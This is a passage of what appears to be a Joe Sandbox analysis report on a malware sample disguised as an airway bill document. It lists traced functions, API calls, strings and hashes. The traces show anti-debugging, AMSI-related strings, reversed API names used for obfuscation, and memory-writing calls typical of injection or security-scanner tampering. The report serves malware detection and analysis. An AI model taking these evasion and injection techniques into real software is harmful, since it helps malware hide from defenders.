                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BA7
                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25BD2
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C19
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C29
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C51
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C61
                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25C87
                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25C97
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                    • Opcode ID: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                    • Instruction ID: 4bd932c78b7b0ae43d0d2699d52b0914be321c09d70b45ade323b729943c388b
                                                                                                    • Opcode Fuzzy Hash: 9065ad0a8360442190b35c3e2e748f86645ee5d370dc3b50e3ecb94d5da7d839
                                                                                                    • Instruction Fuzzy Hash: 84515371A5032C7AFB25DAA88C46FEF77AD9B04744F8001E1B64CE6181E6749A488FA5
                                                                                                    Function 02B38798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 10523 2b38798-2b387bd LoadLibraryW 10524 2b38807-2b3880d 10523->10524 10525 2b387bf-2b387d7 GetProcAddress 10523->10525 10526 2b387d9-2b387f8 call 2b37cf8 10525->10526 10527 2b387fc-2b38802 FreeLibrary 10525->10527 10526->10527 10530 2b387fa 10526->10530 10527->10524 10530->10527
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                    • Opcode ID: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                    • Instruction ID: 8a5edc7cfb20edf46ff924efe6e7fdd27d4fd4135212d1152950f0671cfba796
                                                                                                    • Opcode Fuzzy Hash: 306977690a6c919f8d33b30bb4668b0fc36ed781fd69c50223371d65591a658c
                                                                                                    • Instruction Fuzzy Hash: 7CF0F671EA3324BEEB11AF6DAC44FB6379CE7823D4F0089AAB10C87540C7701826CB50
                                                                                                    Function 02B3EBE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 10540 2b3ebe8-2b3ec02 GetModuleHandleW 10541 2b3ec04-2b3ec16 GetProcAddress 10540->10541 10542 2b3ec2e-2b3ec36 10540->10542 10541->10542 10543 2b3ec18-2b3ec28 CheckRemoteDebuggerPresent 10541->10543 10543->10542 10544 2b3ec2a 10543->10544 10544->10542
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B3EBF8
                                                                                                    • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B3EC0A
                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B3EC21
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                    • API String ID: 35162468-539270669
                                                                                                    • Opcode ID: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                    • Instruction ID: 36edf0b448852898b8c0320bd71328b9f441e0f2367a0802d6d2026963a73c7c
                                                                                                    • Opcode Fuzzy Hash: 9f427d319681537244f2af0cec43e8d4813bf7eb02b0f697c03f7925e479e84f
                                                                                                    • Instruction Fuzzy Hash: 39F0A03090425CAEEB13AAAC88887DCFBA99F09328FA407D6A424B21D1E7755694C651
                                                                                                    Function 02B3DBA8 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DBE3
                                                                                                    • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B3DC78), ref: 02B3DC13
                                                                                                    • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B3DC28
                                                                                                    • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B3DC54
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B3DC5D
                                                                                                      • Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1897104825-0
                                                                                                    • Opcode ID: 7004e8a4fad2d58994b2961b7bbf39b632903f382e0da6f180d1e9148abe172d
                                                                                                    • Instruction ID: 06edcd81b079114e43769282066cb6bac84a80f8c630645dead5d9726a2fcf3a
                                                                                                    • Opcode Fuzzy Hash: 7004e8a4fad2d58994b2961b7bbf39b632903f382e0da6f180d1e9148abe172d
                                                                                                    • Instruction Fuzzy Hash: 68210375A50319BEEB11EAE4CC46FEE77BDEB08700F5005A1B704F71C0DAB4AA048B95
                                                                                                    Function 02B3E2F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CheckConnectionInternet
                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                    • Opcode ID: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                    • Instruction ID: cb1ff9b933552fd49c799d69fa3e744fe6fb54d56ffe49df04c925ced8d9b85f
                                                                                                    • Opcode Fuzzy Hash: 7a797854947e8480ca93950aed7e644b1d959fdbe0f004d08d1ed689d3c99cfd
                                                                                                    • Instruction Fuzzy Hash: B8412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50
                                                                                                    Function 02B3DAC4 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 02B24ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24EDA
                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3764614163-0
                                                                                                    • Opcode ID: 4ef21f81958f4e61dd8dd9669ba8b352768e9cc96ed288da8435ddb670ffaed3
                                                                                                    • Instruction ID: 905621b6259aaa7755e7909b5cc6afafbe30b01d1cc0859b74b1836ac1ea43bc
                                                                                                    • Opcode Fuzzy Hash: 4ef21f81958f4e61dd8dd9669ba8b352768e9cc96ed288da8435ddb670ffaed3
                                                                                                    • Instruction Fuzzy Hash: 9321FF71A40319BAEB11EAE4CD42FDEB7BDEB04B00F5045A1B604F75D0D7B06F048A65
                                                                                                    Function 02B385D4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                                                    • API String ID: 3130163322-2353454454
                                                                                                    • Opcode ID: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                    • Instruction ID: 9cc3bc0a6e313e202488f56eaee7c66dd24cbaf687a8aaff39c4c67155a6f3d7
                                                                                                    • Opcode Fuzzy Hash: 3fd5adf6e5416903907565d791440ba95b4f8232fa1156fd57cedbb187cea5ae
                                                                                                    • Instruction Fuzzy Hash: 8511D0B6650208BFEB41EEACDD81F9A37EDEB4C710F5144A0BA0CE7A40C634E9148B61
                                                                                                    Function 02B379AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 4072585319-445027087
                                                                                                    • Opcode ID: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                    • Instruction ID: 06255f0686641808faaa8339eed2742932e287a1922ef921a54ccb927c6d9abd
                                                                                                    • Opcode Fuzzy Hash: 74cf4a311dc8ea61ca004427ec013a5b89bfb2aaa586ab6fddee0c041c4fa870
                                                                                                    • Instruction Fuzzy Hash: 47111E75650208BFEB01EFA4DC41E9EB7FDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                    Function 02B379AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                    • API String ID: 4072585319-445027087
                                                                                                    • Opcode ID: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                    • Instruction ID: 640fc1c9fc663f496ea03b43a532041b52c29d3713c5d231b6f8012e4c4f273e
                                                                                                    • Opcode Fuzzy Hash: db0b7886bf4cd4e7dfa28968a1590ff0f1281a8b688c3975431a6aed9dcfed13
                                                                                                    • Instruction Fuzzy Hash: D5111B75650208BFEB01EFA4DC81E9EB7BDEB48710F5184A1F918E7A40DA30AA15DB61
                                                                                                    Function 02B3824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                    • API String ID: 2521977463-737317276
                                                                                                    • Opcode ID: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                    • Instruction ID: 424e101567ae36958a713661a9742a4210e6efadb78643fcd98ea09cb64af909
                                                                                                    • Opcode Fuzzy Hash: 2dad35d6677cf6aef4682331e0119c060bb5267822111146ccb84450c2f33f21
                                                                                                    • Instruction Fuzzy Hash: DC012979610208BFEB01EFA8DC41E9A77FEEB48710F5188A0F908D7A00DA34E915CF65
                                                                                                    Function 02B37CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                                                    • API String ID: 2719805696-3542721025
                                                                                                    • Opcode ID: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                    • Instruction ID: 5d068c67dd69075e3ea53939c5cb3fa0a28e5a343968b4cd35cc7ed2045faac5
                                                                                                    • Opcode Fuzzy Hash: babada01ba72f6502961792299fed96c2bb615a639abf29785f502dc9f27111f
                                                                                                    • Instruction Fuzzy Hash: C10129B5650208BFEB02EF98DC41EAAB7FDEB4D710F518490B508E7A90CA30A915DF61
                                                                                                    Function 02B384BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
